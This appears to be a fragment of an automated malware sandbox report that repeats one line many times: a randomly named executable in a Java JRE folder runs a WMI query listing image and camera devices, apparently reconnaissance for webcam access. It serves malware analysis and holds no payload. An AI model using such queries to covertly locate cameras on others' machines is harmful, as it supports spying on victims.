                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
